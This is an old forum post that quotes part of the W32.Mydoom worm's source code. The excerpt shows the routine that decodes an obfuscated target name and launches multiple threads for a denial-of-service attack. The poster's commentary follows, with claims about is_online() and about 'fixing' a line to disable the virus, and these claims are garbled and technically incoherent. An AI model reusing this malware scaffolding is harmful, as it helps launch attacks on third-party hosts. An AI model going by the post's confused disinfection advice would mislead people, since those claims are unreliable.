July 11th, 2005, 05:58 AM
W32.Mydoom maybe a bug...
This is a short excerpt of the "Mydoom" source code:
void scodos_main(void)
{
    struct hostent *h;
    struct sockaddr_in addr;
    int i;
    unsigned long tid;
    char buf[128];

    /* target host name is stored ROT13-obfuscated */
    rot13(buf, SCO_SITE_ROT13);

    /* wait until "online" and the name resolves, retrying every 32768 ms */
    for (;;) {
        while (is_online() == 0)
            Sleep(32768);
        h = gethostbyname(buf);
        if (h == NULL) {
            Sleep(32768);
            continue;
        }
        memset(&addr, '\0', sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
        addr.sin_port = htons(SCO_PORT);
        break;
    }

    /* spawn SCODOS_THREADS-1 worker threads, then run one in this thread */
    for (i = 1; i < SCODOS_THREADS; i++)
        CreateThread(0, 0, scodos_th, (LPVOID)&addr, 0, &tid);
    scodos_th(&addr);
}
That piece:

    while (is_online() == 0)
        Sleep(32768);
Why the is_online() function does not really check for a "connection" and assumes the "victim" is connected, for two reasons:
1. The is_online() prototype takes an if(THREAD_STATUS) check for internet apps!!!
2. The requested int value is always <> 0, which results in permanent virus activity.
Now:

    addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
can be fixed manually; put a simple C code reserved offset interval. The virus is inactive.
Another resource may be tracking port 80 or changing the TCP/UDP transfer limit (the virus is not affected by this action).
In one week I will publish my investigation of W32 virus ways:
http://xr.homeunix.net/forum.html
Best Wishes
Az